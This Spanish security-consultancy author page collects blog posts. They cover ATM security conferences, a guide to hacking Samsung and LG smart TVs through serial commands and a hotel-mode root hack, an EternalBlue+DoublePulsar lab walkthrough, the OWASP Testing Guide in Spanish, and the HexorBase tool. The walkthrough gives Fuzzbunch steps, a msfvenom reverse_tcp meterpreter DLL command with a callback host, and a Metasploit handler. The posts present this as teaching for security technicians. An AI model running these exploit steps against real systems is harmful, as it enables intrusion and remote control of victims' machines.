Autoraandradex

Inicio/Artículos Publicados por aandradex

Éxito total nuestra participación en ATMIA Orlando y ATM & Cash Innovation Panamá

Este año tuvimos el gusto de participar en dos oportunidades en los eventos que organiza ATMIA (ATM industry Association) a nivel internacional, el primero fue en Orlando EEUU y este último en la hermosa Ciudad de Panamá.

Tengo que confesar que en ambos eventos lograron cubrir nuestras expectativas y sobre todo pudimos abrir nuevas oportunidades de negocios en varios países que están interesados en nuestras soluciones de seguridad enfocadas en banca.

Durante el evento en Panamá y Gracias a la valoración del público obtuvimos el título de Mejor Conferencia durante el evento y nuestro Booth fue sin lugar a dudas el mas lleno durante los días del evento, con lo cual y fuera de quedar muy satisfechos con los resultados, pudimos comprobar por la respuesta del público y los bancos que nos visitaron, que vamos por buen camino en el desarrollo de nuestras soluciones de seguridad para banca, llamando así la atención de gigantes como Citibank de EEUU.

Lo bueno de estar de expositores locales, fue que pudimos llevar nuestro propio ATM al ATMIA y realizar demostraciones en vivo, sobre los diferentes tipos de ataques que se están realizando sobre los cajeros ATM en diferentes partes del mundo, comprobando así la eficiencia y eficacia de KAS (Krypto ATM Systems) al momento de detectar desde la apertura del ATM, logins correctos o incorrectos, ejecución de nuevos procesos, integridad de archivos, hasta la conexión de cualquier dispositivo USB en el mismo, reportando de manera inmediata y en tiempo real al correo y celular de la persona indicada para atender estos temas y las diferentes respuestas activas que podemos enviar al ATM para bloquear y evitar que el atacante pueda extraer el dinero.

KAS no solamente se ha convertido en la herramienta mas rápida y versátil en la detección de ciberataques a cajeros ATM, otro de los puntos a favor que nos ha permitido abrir rápidamente mercado dentro la industria de seguridad en cajeros ATM, es que es la primer herramienta de este tipo basada en un motor de Big Data, que permite tener dashboards personalizables, a gusto del cliente y con el precio mas económico que cualquier otra solución de seguridad para cajeros ATM del mercado.

Otra de las soluciones que causó un gran impacto, fue Pentest365, un servicio “Cloud Based” (Basado en la Nube), que se encarga de realizar un Pentesting automatizado 24×7 a toda la infraestructura de TI de una organización, sin importar el tamaño o la diversidad de marcas, sistemas operativos, aplicaciones o tecnologías que se encuentren de por medio. Mas adelante tenemos preparado un post completo a este excelente servicio pero si eres curioso, puedes ver mas información desde el sitio web de Pentest365.

Actualmente contamos con oficinas en Panamá, México y Canadá desde donde afrontamos las diferentes líneas de negocio de la empresa con un excelente equipo profesional de Recursos Humanos.

Pronto les informaremos sobre las novedades en las que estamos trabajando y los nuevos países en los que estaremos dando charlas o presentando nuestros productos. Para cualquier consulta pueden escribirnos a info@ehcgroup.io

CÓMO HACKEAR FÁCILMENTE TU SMART TV – SAMSUNG Y LG

Originalmente llamado “televisores conectados”, y ahora se llama como “Televisores SMART”. Cualquier televisión que se puede conectar a Internet para acceder a los servicios, uso de aplicaciones y se comportan de alguna manera como nuestros ordenadores con navegador web se llama SMART TV. Televisores inteligentes se conectan a Internet a través de conexión Ethernet cableada o con conexión Wi-Fi para conectarse a una red doméstica. Televisores inteligentes requieren chips de computadora para procesamiento de vídeo, pantallas múltiples y una conexión a Internet. También utilizan la memoria para amortiguar la transmisión de vídeo y música, y necesitan la potencia de procesamiento adicional para hacer frente a los gráficos. Los televisores se pueden controlar mediante comandos de voz y aplicaciones que se ejecutan en algunos teléfonos inteligentes.

Dan Reynolds, experto de capacitación y soluciones de seguridad informática de International Institute of cyber security explica que estos televisores inteligentes no son tan inteligentes y la seguridad del software no es exactamente perfecta. Televisores Smart se parecen por nosotros el Internet de las cosas (IoT) pero vulnerabilidades que fueron considerados haber desaparecido por completo son las nuevas vulnerabilidades en el Internet de las Cosas (IoT). A veces se puede encontrar fácilmente un defecto que puede permitirle tomar una variedad de acciones en el televisor, incluyendo el acceso a datos potencialmente sensibles, archivos remotos e información, la imagen de unidad y, finalmente, obtener acceso root del dispositivo.

En el artículo vamos a cubrir diferentes aspectos de televisores inteligentes de dos marcas más famosas Samsung y LG con ayuda de profesor de curso de hacking ético de IICybersecurity.

Entender Sistema operativo de SAMSUNG SMART TV

Tizen es un sistema operativo basado en el kernel de Linux y librería C de GNU implementación de la API de Linux. Se dirige a una amplia gama de dispositivos, incluyendo teléfonos inteligentes, tabletas, dispositivos de información y entretenimiento a bordo de vehículos, televisores inteligentes, ordenadores, cámaras inteligentes, computación portátil, reproductores Blu-ray, impresoras y electrodomésticos inteligentes. Su objetivo es ofrecer una experiencia de usuario consistente a través de los dispositivos. Tizen se implementaría en Samsung televisores a partir de 2015.

 

Tizen-OS-architecture
Tizen-OS-architecture

 

Hay algunas comunidades en línea que están trabajando sobre la investigación de sistema operativo de televisión inteligente de Samsung como (SamyGo) menciona experto de capacitación y soluciones de seguridad informática.

 

sammygo-forum
sammygo-forum

 

sammy-go-samsung
sammy-go-samsung

Cómo hacer análisis sobre el firmware de Samsung Smart TV

Primer paso hacia la piratería de cualquier sistema es saber sobre el sistema. Para entender la arquitectura y supervisar el tráfico que su Smart TV está enviando usted tendrá que conectar su ordenador con Smart TV. ExLink conector consiste en un cable que tiene en un lado un conector de 3,5 mm, como los de audio, y en el otro lado un (Serial) conector DB9 RS232. Este cable le permite conectar su ordenador PC al televisor, y entrar en el modo de serie. Con ello se puede utilizar un software de comunicaciones de serie, como Hyperterminal, Putty de Windows o Linux.

Ex-link-connector-samsung
Ex-link-connector-samsung

 

Conexión al televisor Samsung

  1. Coloque el televisor en modo de espera, pulse [Info] y luego [Menú] y luego [Mute] y luego [Power] cuando el televisor se prende se muestra un nuevo menú de servicio.
  2. Habilitado la opción de hotel, y establecer la interfaz RS-232 para UART.
  3. Apágalo y vuelva a prenderlo.

Televisor debería estar listo para la comunicación con PC.

Conexión de Wireshark con Smasung Smart TV

Hay un dissector de Wireshark para el protocolo de Samsung SmartTV.

 

Wireshark-Samsung-dissector
Wireshark-Samsung-dissector

 

Este dissector permite filtrar las capturas de Wireshark y decodificar los paquetes de control remoto que se envían al televisor mediante WiFi y paquetes que se envían desde la TV a la unidad de control remoto. Este plugin de Wireshark, permite la creación simple declarativa de sus propios dissectores para protocolos personalizados.

Para instalar este dissector en su instalación de Wireshark hay que hacer las siguientes acciones:

Descargar versión de WSGD que coincida con su versión de Wireshark y arquitectura de la máquina y guarda en su carpeta de plugins de Wireshark. Descomprimir archivos dissector (por ejemplo /usr/lib/wireshark/libwireshark0/plugins/).

Para ver dissector en la acción podría hacer esto:

  • Ejecuta Wireshark con dissector instalado. Descargar archivo de captura y abrirlo en Wireshark.
  • Escriba samsung_remote en el campo de filtro y ver paquetes de Samsung.
  • Haga clic en uno de los paquetes marcados con el protocolo SR y ver datos en paquetes decodificados.

 

Dissector-Samsung-wiresahrk
Dissector-Samsung-wiresahrk

 

Puede probar la conexión con algunos de los comandos

TV On: \x08\x22\x00\x00\x00\x02\xd6\r
TV Off: \x08\x22\x00\x00\x00\x01\xd5
HDMI1: \x08\x22\x0a\x00\x05\x00\xc7
Sintonizador de TV: \x08\x22\x0a\x00\x00\x00\xcc
Subir volumen: \x08\x22\x01\x00\x01\x00\xd4
Bajar volumen: \x08\x22\x01\x00\x02\x00\xd3
Toggle Mute: \x08\x22\x02\x00\x00\x00\xd4
Altavoz: \x08\x22\x0c\x06\x00\x00\xc4
Altavoz desactivado: \x08\x22\x0c\x06\x00\x01\xc3
HDMI 2: \x08\x22\x0a\x00\x05\x01\xc6
HDMI 3: \x08\x22\x0a\x00\x05\x02\XC5

Samsung-serial-commands
Samsung-serial-commands
Samsung-serial-commands
Samsung-serial-commands
Samsung-serial-commands
Samsung-serial-commands
Samsung-serial-commands
Samsung-serial-commands

 

Smart TV Modo Hotel Hack

Algunos modelos de televisores de Samsung, tienen una opción, para cambiarse televisión en modo cuando esté instalada en hoteles. Esto hace que la televisión trabaja en un entorno aislado, que protege a algunas funciones como modificaciones los huéspedes quieren hacer. Puede utilizar los pasos mencionados a continuación para introducirse en el modo de hotel y tomar el control root.

Hotel-Mode-hack
Hotel-Mode-hack
Hotel-Mode-hack
Hotel-Mode-hack
Hotel-Mode-hack
Hotel-Mode-hack

 

Hay muchos proyectos independientes relacionados con Samsung Smart TV en Github. Al igual que Samsung-Remote explica Dan Reynolds, experto de capacitación y soluciones de seguridad informática en México.

 

Github-Samsung
Github-Samsung

 

 

Entender Sistema operativo de LG SMART TV

 

Cuando usted compra un LG Smart TV, se obtiene un televisor LG con sistema operativo WebOS. WebOS, también conocido como LG WebOS, Open WebOS, HP WebOS, o Palm WebOS, es un sistema operativo basado en kernel de Linux para dispositivos inteligentes como televisores y relojes inteligentes y era antiguamente un sistema operativo de móviles. Inicialmente desarrollado por Palm, que fue adquirida por HP, HP hizo la plataforma de HP WebOS a código abierto, y se convirtió en Open WebOS. El sistema operativo fue posteriormente vendido a LG Electronics.

OpenWebOS-architecture

 

Como el WebOS es de código abierto, hay algunas comunidades en línea de código abierto como (openwebosproject, openlgtv) que trabajan sobre el firmware. De estas comunidades se puede descargar firmware del sistema operativo y hacer su propia investigación.

 

OpenWebOS-community

 

OpenLGTv-community

 

Conexión a Smart TV

Primer paso hacia la piratería de cualquier sistema es saber sobre el sistema. Para entender la arquitectura y supervisar el tráfico que su Smart TV está enviando usted tendrá que conectar su ordenador con Smart TV. Para llegar al nivel de firmware, tendrá que conectarse a través de la interfaz RS-232C. Puede conectarse fácilmente al cable RS-232 de la televisión al USB del ordenador.

En general se recomienda el sistema operativo Linux. Hay informes de los usuarios, los cuales tuvieron problemas con algunos adaptadores USB2Serial bajo Windows 7, por lo que en este momento se recomienda Windows XP para el uso de adaptadores USB2Serial.

 

LG_USB-Serial_adapter_cable

 

Inicie la televisión e ir al menú “Opciones” utilizando el control y establece Set ID en 1. Necesitará programa de emulación de terminal, como HyperTerminal o Putty. Ajuste la siguiente configuración 9600 o 115200 baud (en firmwares recientes ahora es 115200bps baud rate por defecto), 8N1, XON / XOFF. Longitud de datos: 8 bits, Paridad: Ninguna, Stop Bit: 1 bit, el código de comunicación: código ASCII. Mediante la emisión de siguientes comandos se puede comprobar la conexión. Hay un montón de diferentes comandos para jugar con el sistema.

 

LG-Serial-commands

 

Protocolo de Transmisión / Recepción

Transmisión

[Command1][Command2][ ][Set ID][ ][Data][Cr]

[Command 1]: Primer comando para controlar set.(j, k, m o x)

[Command 2] : Segundo comando para controlar set.

[Set ID] : Puede ajustar set ID para seleccionar set identificación deseada en el menú de opciones. Rango de ajuste es de 1 y 99. Si selecciona Set ID 0, todo conectado el set se controla. Set ID se expresa como un decimal (1 ~ 99) en el menú y como un hexadecimal (0x0 ~ 0x63) en protocolo de recepción y transmisión.

[DATA]: Para transmitir los datos del comando. Transmitir los datos FF para leer el estado del comando.

[Cr] : Carriage Return código ASCII 0x0D

[ ] : Código ASCII de Espacio (0x20)
* En este modelo, set no enviará el estado durante el modo de espera.

OK Acknowledgement

[Command2][ ][Set ID][ ][OK][Data][x]

Set transmite ACK (confirmación) basado en este formato al recibir los datos normales. En este momento, si los datos son el modo de lectura de datos, indica datos del estado actual. Si los datos son el modo de escritura de datos, devuelve los datos a computadora.

* En este modelo, set no enviará el estado durante el modo de standby. * Formato de datos [Comando 2]: Uso como comando. [Set ID]: Use el carácter pequeño, si la ID definida es 10, enviará el 0, a. [DATOS]: Use el carácter pequeño, si los datos es 0 x ab, enviará el a, b. [OK]: Use el carácter grande.

Reconocimiento de error

[Comando2] [] [Set ID] [] [NG] [Data] [x]

Set transmite ACK (confirmación) basado en este formato al recibir datos anormales de funciones no viables o errores de comunicación.

Data01: Código ilegal Data02: función no soportadas Data03: Esperar más tiempo * En este modelo, set no enviará el estado durante el modo de standby. * Formato de datos [Comando 2]: Uso como comando. [Set ID]: Use el carácter pequeño, si la ID definida es 10, enviará el 0, a. [DATA]: Use el carácter pequeño, si los datos es 0 x ab, enviará el a, b. [NG]: Use el carácter grande. 

Power (Comando: k a)

Para controlar el prendido / apagado de la unidad.

Transmisión [k] [a] [] [Set ID] [] [Data] [Cr]

Datos 00: Apagado Data 01: Prendido

Reconocimiento [a] [] [Set ID] [] [OK / NG] [Data] [x]

* De una manera similar, si otras funciones transmiten datos ‘FF’ basados ​​en este formato, resulto de datos de reconocimiento presenta el estado de cada función.

* Nota: En este modelo, sistema enviará la confirmación después prender complemente

Puede haber un retraso entre el comando y reconocer.

 

LG-Serial-commands

LG-Serial-commands

LG-Serial-commands

LG-Serial-commands

 

O también puede utilizar scripts disponibles en Internet como libLGTV_serial. Mike Stevens, profesor de curso de hacking en México menciona que libLGTV_serial es una librería de Python para controlar televisores de LG a través de su puerto serie (RS232).

 

LGserial-github

LG TV USB IR-HACK CON ADRUINO

Puede hackear fácilmente el televisor LG con una tarjeta adruino través de scripts.

Esta librería remoto por infrarrojos consta de dos partes: IRsend transmite paquetes IR remotas, mientras que IRrecv recibe y decodifica un mensaje de IR.

 

adruino

adruino

 

Github-LG

 

Usted puede aprender más sobre hacks con adruino de proyectos de Github y comunidades de código abierto.

Cómo activar el reproductor de USB a través de RS232

  1. Conecte la PC a través del puerto COM o el adaptador USB2COM (USBtoRS232).
  2. Ejecutar programa de terminal en el PC (hyperterminal o putty por ejemplo)
  3. Establezca los siguientes parámetros para el puerto COM: Velocidad 9600, el control de flujo: ninguno. Todos los demás abandonan a los valores predeterminados.
  4. En la terminal escriba: “ab 0 ff” y presiona “Enter”. Usted debe hacerse la siguiente respuesta “01 ok ???? x”, donde ???? Es el número de la opción de herramienta. Recuerde o escriba en la hoja de papel.
  5. Para activar USB reproductor multimedia escriba: “ab 0 6″ y presiona Enter.
  6. Apague el televisor. Icono de USB debería aparecer en el menú principal de TV.

Firmware personalizado

Puede descargar viejos firmwares de los sitios web oficiales de LG o foros de Internet. Estos firmwares son personalizados según las necesidades de los usuarios.

LG-firmware

LG-hack-forum

 

Mike Stevens, profesor de curso de hacking en México explica que con los comandos de serie, scripts y junto con vulnerabilidades cualquiera hacker puede hackear un televisor inteligente. Algunas de las vulnerabilidades conocidas para los que diferentes exploits están disponibles en mercado negro son:

Autenticación Débil

El protocolo es muy simple en términos de autenticación y el paquete de autenticación sólo necesita una dirección IP, una dirección MAC y un nombre de host para la autenticación. Usted puede romper fácilmente el protocolo. También la autenticación de cliente no es tan fuerte. Asimismo, el protocolo no maneja autenticación de NULL MAC dirección y por lo tanto cualquier dispositivo con valor Null de dirección MAC se puede conectar a la TV.

Vulnerabilidades de APIs de TV

Un hacker puede hackear e instalar malware a través de las API de televisión como File.Unzip o Skype. Estos pueden ser usados ​​para copiar archivos a cualquier sistema en el objetivo de instalar una puerta trasera.

Vulnerabilidades de ataque de Man in Middle

Mediante el uso de vulnerabilidades de un ataque MIM un hacker puede interceptar los datos como la televisión no comprueba los certificados del servidor. Así, con certificados falsos que un hacker puede hacer fácilmente ataque de Man in Middle.

Creación de programas maliciosos para Smart TV no es tan diferente de la creación de malware para PC o sistemas Linux, según expertos de capacitación y soluciones de seguridad informática. La base de sistema operativo es Linux y tiene vulnerabilidades. Así, mediante el uso de los comandos serie y vulnerabilidades, un hacker puede piratear fácilmente en televisión inteligente. Además, como no hay antivirus o soluciones de anti malware disponibles para televisores inteligentes, por lo que se hace más fácil para un hacker para introducirse en televisores inteligentes.

 

Fuentes:

www.openlgtv.org.ru

www.wiki.samygo.tv

www.iicybersecurity.com

How to: explotando Eternalblue + Doublepulsar

Hace pocos días saltaba la noticia de que se el grupo Shadow Brokers había liberado una nueva hornada de exploits de la NSA. Por si esto fuera poco, en el github donde están los exploits también hay información sobre como atacar a los sistemas bancarios.

La gran mayoría de los exploits publicados hacen que comprometer un sistema Windows sea cosa de niños y casi como vemos en las películas, puesto que ente ellos se encuentran varios 0-day (ahora ya parcheados por Microsoft) que atacan al protocolo SMB en todas sus versiones.

De todos los exploits disponibles, el que más ha llamado la atención a la comunidad ha sido el combo del llamado Eternalblue + Doublepulsar. En este post vamos a explicar cómo desplegar un entorno de pruebas donde poder probar los exploits.

(Aclaración: Sobra decir que la información se proporciona a título informativo y didáctico, con objeto de colaborar a mejorar el conocimiento de los técnicos en ciberseguridad. Los cibercriminales no necesitan que nadie les enseñe cómo utilizar los exploits.).

Necesitaremos:

  1. Máquina Virtual Windows atacante.
  2. Maquina Vitrual Windows víctima.
  3. Equipo con Linux.

Una vez desplegadas las máquinas virtuales de Windows, el primer paso es preparar una de ellas como la atacante. En esta debemos satisfacer una serie de requisitos para poder utilizar el framework Fuzzbunch, que es desde donde lanzaremos los exploits. Para ello se debe descargar el repositorio del git donde se han publicado los exploits y herramientas.

Se puede hacer con un “git clone” o descargando el repositorio directamente:

Una vez clonado el repositorio en nuestro equipo, habrá que acceder al directorio Windows que está dentro de EQGRP_Lost_in_Translation y crear la carpeta listeningposts. Si no hacemos esto, al intentar ejecutar Fuzzbunch nos saltará un error avisando de que no encuentra el directorio.

Para poder ejecutar el framework correctamente y sin ningún error se necesita de una versión antigua de Python y de Pywin32:

  1. Python 2.6.6 de 32bits (se ha probado con Python 2.7 y no funciona).
  2. PyWin32-221 para Python 2.6.6.
  3. Jre-6u15-windows-i-586.

Una vez esté todo instalado vamos a pasar a la acción. Aquí utilizaremos powershell pero también se puede hacer mediante cmd.

Uso del Framework Fuzzbunch

Desde el directorio EQGRP_Lost_in_Translation/windows ejecutamos Python fb.py para acceder al framework, e introducimos los siguientes parámetros:

  • Default Default target IP Addres [] : IP de la víctima.
  • Dafault Callback Addres [] : IP de nuestra máquina Windows.
  • Use redirection[yes] : Establecer a ‘no’.
  • Base Log directory [D:\logs] : Establecer la ruta para almacenar los logs.

Acto seguido hay que crear un proyecto. Una vez realizados estos pasos, veremos en el prompt fb>

Ilustración 1 Terminal del framework

Para visualizar qué exploits hay disponibles podemos teclear Show Exploits:

Ilustración 2 Exploits disponibles

Como se ha comentado anteriormente, en este post se va a explicar Eternalblue (auque no salga en la lista, está disponible) junto con Doublepulsar. Muy por encima, Eternalblue se encarga de crear un backdoor y Doublepulsar inyecta una dll en el proceso del sistema que queramos.

Eternalblue

Para hacer uso de Eternalblue hay que teclear use Eternalblue y acto seguido introducir la información solicitada por pantalla:

Ilustración 3 Configurando Eternalblue

Si todo ha salido bien veremos el siguiente mensaje en el terminal:

Ilustración 4 Ejecución terminada con éxito

Doublepulsar

Con la backdor creada con Eternalblue, el próximo paso a realizar es inyectar una dll en un proceso del sistema comprometido haciendo uso de Doublepulsar.

Para generar la dll podemos hacer uso de msfvenom:

msfvenom -a x64 -p windows/meterpreter/reverse_tcp lhost=IP lport=PUERTO -f dll -o raccoon64V2.dll

Y desde metasploit dejar un handler esperando a recibir una conexión desde la máquina comprometida:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

[..]

Volviendo a Doublepulsar, como en el proceso anterior hay que introducir la información que va apareciendo en el terminal:

Ilustración 5 Configuración Doublepulsar

Si lo hemos hecho todo bien, tendremos en nuestro equipo local un meterpreter con privilegios SYSTEM sobre la máquina virtual víctima. Con unos sencillos pasos y un par de clicks hemos llegado a comprometer un equipo conociendo solo su dirección IP.

Ilustración 6 Sesión de meterpreter

Por último y no menos importante, una vez tengamos la conexión con el meterpreter deberemos volver a ejecutar Doublepulsar y seleccionar la opción:

4) Uninstall           Remove's backdoor from system

Para eliminar la backdoor, puesto que ya no la necesitamos.

Ilustración 7 Eliminación de la backdoor

Como se ha podido observar, resulta alarmante la facilidad con la que se consigue comprometer un sistema Windows haciendo uso de estos exploits.

En estos momentos creo que todo el mundo se estará preguntando: ¿si esto es lo que se ha publicado, que más cosas tendrán los chicos buenos de la NSA?

 

Visto en: SecurityatWork

Estaremos en el ATMIA & CASH INNOVATION LATAM

Par los que no están al tanto de que es ATMIA (ATM Industry Association), es uno de los eventos mas grandes a nivel internacional que reúne cada año a cientos de empresas de todo el mundo que trabajan en el mercado de cajeros ATM, desde proveedores de cajeros ATM de las marcas mas conocidas como NCR, Diebold, Wincor, Hayosung, Triton y otras nuevas, hasta proveedores de software para cajeros y diferentes tipos de servicios que generan un valor agregado a los bancos.

En este sentido, la empresa viene desarrollando desde hace dos años, un producto de Ciber Seguridad para cajeros ATM, llamado KAS el cual fue lanzado en ATMIA New Orleans y en ATMIA Orlando durante el 2016 en los EEUU, donde recibimos excelentes comentarios y oportunidades de negocio que nos permitieron extender nuestros servicios hacia el norte del continente americano desde México, Estados Unidos hasta Canadá.

Este mes de Abril del 18 al 20 del presente, se llevará por primera vez en Latinoamérica el “ATMIA & CASH INNOVATION LATAM” y tenemos la suerte de participar nuevamente, pero esta vez como locales en la hermosa ciudad de Panamá en las instalaciones del Trump International Hotel and Tower.

Te invitamos a que participes con nosotros del lanzamiento de algunos de nuestros productos de Ciber Seguridad para Banca y a que participes en la conferencia que daremos “Breaking Multivendor ATM Security“. La conferencia tratará sobre los diferentes tipos de ataques que existen a cajeros Automáticos, tanto remotos, físicos, lógicos y de otro tipo que mostraremos durante el evento. No te la pierdas !!! Miércoles 19 a las 13:30

Estamos llevando nuestro ATM del laboratorio para hacer diferentes tipos de pruebas de ataques como las de malware y que puedas ver como nuestra solución KAS bloquea y alerta en tiempo real, mostrando un dashboard bastante avanzado al cual le hemos agregado mucho I+D.

Otra de las demos que haremos será con nuestro servicio de Pentesting Persistente desde la Nube (Pentest365), para mostrarte que tan fácil es detectar vulnerabilidades de forma preventiva y blindar tu infraestructura tecnológica con auditorias persistentes y monitereo constante 24×7 los 365 días del año.

No olvides pasar por nuestro Stand #27, estaremos regalando unos gadgets buenísimos y podrás probar y ver nuestras soluciones de Ciberseguridad.

 

OWASP Testing Guide v4.0 ahora en Español

Así es amigos, ahora podrán disfrutar de la muy conocida Guía de Pruebas OWASP 4.0 pero en su versión en español, gracias al trabajo y aporte de dos ecuatorianos, Fernando Vela y Roberto Andrade de la Escuela Politecnica Nacional,  que lo compartieron, podemos anunciar un pre-release de esta guía en nuestro idioma.

La versión 4 en español:  OWASP Testing Guide 4.0 en Español

La versión 4 en ingles  OWASP Testing Guide v 4.0

El documento esta dividido por :

  • Introducción al proyecto guía de pruebas de OWASP y el proyecto completo OWASP
  • Marco referencial al framework de pruebas de OWASP
  • Pruebas de seguridad de aplicaciones WEB
    • Introducción y objetivos
    • Pruebas para gestionar la configuración y la implementación
    • Pruebas de Administración de Identidad
    • Pruebas de autenticación
    • Pruebas de autorización
    • Pruebas de administración de sesión
    • Pruebas de validación de entradas
    • Pruebas de manejo de errores
    • Pruebas para Criptografía débil
    • Prueba de la lógica del negocio
    • Pruebas en el lado del cliente
  • Apéndice
    • Apéndice A: Herramientas de prueba
    • Apéndice B: Lecturas sugeridas
    • Apéndice C: Vectores Fuzz
    • Apéndice D: Inyección codificada

Metodología, puntos de control y pruebas de seguridad

Los tests o pruebas se agrupan en 11 categorías para sumar un total de 91 puntos de control:

  1. Information Gathering
  2. Configuration and Deployment Management Testing
  3. Identity Management Testing
  4. Authentication Testing
  5. Authorization Testing
  6. Session Management Testing
  7. Input Validation Testing
  8. Error Handling
  9. Cryptography
  10. Business Logic Testing
  11. Client Side Testing

OWASP tiene su propia wiki, a continuación un enlace, ahí tu puedes encontrar los puntos de control mencionado pero en un listado detallado.

Testing_Checklist

Este pre-relase tiene como con fin solicitar apoyo en la detección y corrección de errores antes de que sea oficialmente integrado al proyecto OWASP, por eso necesitamos tu apoyo si encuentras problemas de traducción por favor notifica a:

Fernando Vela   fercho.vela@gmail.com
Roberto Andrade   robertoandrade533@hotmail.com

Solo especifica el error, la pagina y el párrafo donde la encontraste dicho error de traducción.

Nos vemos pronto con mas novedades sobre el entorno de pruebas OWASP.

 

Hexorbase Excelente herramienta de auditoria y administración de múltiples bases de datos

HexorBase es una aplicación de base de datos diseñada para la administración y la auditoria de varios servidores de bases de datos de forma simultánea desde una ubicación centralizada, es capaz de realizar consultas SQL y ataques de fuerza bruta contra servidores de bases de datos (MySQL, SQLite, Microsoft SQL Server, Oracle y PostgreSQL).

Esta poderosa herramienta permite enrutamiento de paquetes a través de proxies e incluso permite pivotear a través de Metasploit para comunicarse con servidores de forma remota que están ocultos dentro de las subredes locales. Sin duda alguna una muy buena opción a la hora de realizar un Pentesting.

HexorBase01

HexorBase ya viene instalada en Kali Linux pero si deseas hacer tu propia instalación en el sistema operativo de tu preferencia, trabaja muy bien en Linux como en Windows bajo los siguientes requisitos:

  • python
  • python-qt4
  • cx_Oracle
  • python-mysqldb
  • python-psycopg2
  • python-pymssql
  • python-qscintilla2

Para instalarla solo hay que descargarse el .deb desde:

https://code.google.com/p/hexorbase/downloads/list

Y ejecutar:

root@host:~# dpkg -i hexorbase_1.0_all.deb

HexorBase03

Cualquier consulta pueden dejar sus comentarios.

Ethical Hacking Consultores presente en México en el PJENL-CONNECTIT 2014

Del 7 al 10 de julio del presente tendremos el placer de participar en Monterrey del CONNECTIT 2014 del Poder Judicial del Estado de Nuevo León.

El evento pretende ser uno de los más grandes e importantes referentes en materia de Derecho y Tecnología, al cual están invitando a reconocidos profesionales internacionales y locales para participar de charlas, conferencias, exposiciones, talleres y hasta videoconferencias.

El Pabellón Tecnológico abrirá con la Presentación y rediseño del Portal y Micrositios del Poder Judicial del Estado de Nuevo León, habrán simulaciones de salas de juicio oral, demostraciones de aplicaciones para la comunicación procesal, nuestras conferencias de varios expositores y otras actividades que se ven interesantes.

Uno de los puntos que llamó mi atención son las presentaciones de diferentes Socios de Negocio Tecnológico, que supongo son proveedores de tecnologías en hardware y software, pero habrá que ver que cosas interesantes y novedosas aparecen en estas presentaciones.

Por otro lado tendré el gusto de volver a encontrarme con dos amigos y reconocidos profesionales miembros de la FIADI, la Dra. Myrna Elia García Barrera y el Dr. Julio tellez Valdez que participarán en este especial evento.

Por mi lado he preparado una conferencia que va dirigida sobre un tema especial que me lo solicitaron y creo que les llevo algo que les gustará bastante donde hablaremos sobre Hackers, Evidencia Digitial y Prueba Electrónica.

Ya les comentaré mayores detalles desde México que también vamos a ver a unos clientes por temas de trabajo por lo que retornamos a Panamá el 13 de Julio.

Saludos.